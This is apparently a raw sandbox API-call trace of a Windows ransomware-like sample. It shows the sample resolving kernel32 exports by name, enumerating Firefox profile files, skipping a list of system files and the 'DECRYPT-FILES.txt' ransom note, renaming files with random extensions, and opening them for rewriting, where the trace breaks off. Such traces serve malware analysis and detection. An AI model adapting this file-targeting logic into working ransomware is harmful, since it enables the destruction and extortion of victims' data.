lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0184.060] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0184.060] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0184.060] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0184.060] lstrlenA (lpString="CREATEJOBSET") returned 12 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0184.060] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0184.060] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0184.060] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0184.060] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0184.060] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0184.060] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0184.060] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0184.060] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0184.060] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0184.060] lstrlenA (lpString="CREATEPIPE") returned 10 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0184.060] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0184.060] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0184.060] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0184.060] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0184.060] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0184.060] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0184.061] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0184.061] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0184.061] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0184.061] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0184.061] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0184.061] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0184.061] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0184.061] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0184.061] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0184.061] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0184.061] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0184.061] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0184.061] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0184.061] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0184.061] lstrlenA (lpString="CREATETHREAD") returned 12 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0184.061] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0184.061] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0184.061] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0184.061] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0184.061] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0184.062] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0184.062] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0184.062] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0184.062] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0184.062] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0184.062] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0184.062] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0184.062] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0184.062] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0184.062] lstrlenA (lpString="CTRLROUTINE") returned 11 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0184.062] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0184.062] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0184.062] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0184.062] lstrlenA (lpString="DEBUGBREAK") returned 10 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0184.062] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0184.062] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0184.062] lstrlenA (lpString="DECODEPOINTER") returned 13 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0184.062] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0184.062] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0184.062] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0184.063] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0184.063] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0184.063] lstrlenA (lpString="DELETEATOM") returned 10 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0184.063] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0184.063] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0184.063] lstrlenA (lpString="DELETEFIBER") returned 11 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0184.063] lstrlenA (lpString="DELETEFILEA") returned 11 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0184.063] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0184.063] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0184.063] lstrlenA (lpString="DELETEFILEW") returned 11 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0184.063] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0184.063] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0184.063] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0184.063] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0184.063] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0184.063] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0184.063] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0184.063] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0184.063] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0184.064] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0184.064] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0184.064] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0184.064] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0184.064] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0184.064] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0184.064] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0184.064] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0184.064] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0184.064] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0184.064] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0184.064] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0184.064] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0184.064] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0184.064] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0184.064] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0184.064] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0184.064] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0184.064] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0184.065] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0184.065] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0184.065] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0184.065] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0184.065] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0184.065] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0184.065] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0184.065] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0184.065] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0184.065] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0184.065] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0184.065] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0184.065] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0184.065] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0184.065] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0184.065] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.h4wDq") returned 111 [0184.066] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.h4wDq.nK1XBh") returned 118 [0184.066] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.h4wDq" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini.h4wdq"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\compatibility.ini.h4wDq.nK1XBh" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\compatibility.ini.h4wdq.nk1xbh"), dwFlags=0x0) returned 1 [0184.067] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.068] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.068] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0184.068] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb5e8ce50, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb5e8ce50, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xac5f7e40, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x38108, dwReserved0=0x0, dwReserved1=0x0, cFileName="content-prefs.sqlite.CfNXlP", cAlternateFileName="CONTEN~1.CFN")) returned 1 [0184.068] lstrcmpiW (lpString1="content-prefs.sqlite.CfNXlP", lpString2="DECRYPT-FILES.txt") returned -1 [0184.068] lstrcmpiW (lpString1="content-prefs.sqlite.CfNXlP", lpString2="autorun.inf") returned 1 [0184.068] lstrcmpiW (lpString1="content-prefs.sqlite.CfNXlP", lpString2="boot.ini") returned 1 [0184.068] lstrcmpiW (lpString1="content-prefs.sqlite.CfNXlP", lpString2="desktop.ini") returned -1 [0184.068] lstrcmpiW (lpString1="content-prefs.sqlite.CfNXlP", lpString2="ntuser.dat") returned -1 [0184.068] lstrcmpiW (lpString1="content-prefs.sqlite.CfNXlP", lpString2="iconcache.db") returned -1 [0184.068] lstrcmpiW (lpString1="content-prefs.sqlite.CfNXlP", lpString2="bootsect.bak") returned 1 [0184.068] lstrcmpiW (lpString1="content-prefs.sqlite.CfNXlP", lpString2="ntuser.dat.log") returned -1 [0184.068] lstrcmpiW (lpString1="content-prefs.sqlite.CfNXlP", lpString2="thumbs.db") returned -1 [0184.068] lstrcmpiW (lpString1="content-prefs.sqlite.CfNXlP", lpString2="Bootfont.bin") returned 1 [0184.068] lstrlenW (lpString="content-prefs.sqlite.CfNXlP") returned 27 [0184.068] lstrcmpiW (lpString1="CfNXlP", lpString2="lnk") returned -1 [0184.068] lstrcmpiW (lpString1="CfNXlP", lpString2="exe") returned -1 [0184.069] lstrcmpiW (lpString1="CfNXlP", lpString2="sys") returned -1 [0184.069] lstrcmpiW (lpString1="CfNXlP", lpString2="dll") returned -1 [0184.069] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned 88 [0184.069] lstrlenW (lpString="content-prefs.sqlite.CfNXlP") returned 27 [0184.069] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\" [0184.069] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\", lpString2="content-prefs.sqlite.CfNXlP" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.CfNXlP") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.CfNXlP" [0184.069] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0184.069] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\silmbjec.default\\content-prefs.sqlite.CfNXlP" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\mozilla\\firefox\\profiles\\silmbjec.default\\content-prefs.sqlite.cfnxlp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0184.069] GetFileSizeEx (in: hFile=0x284, 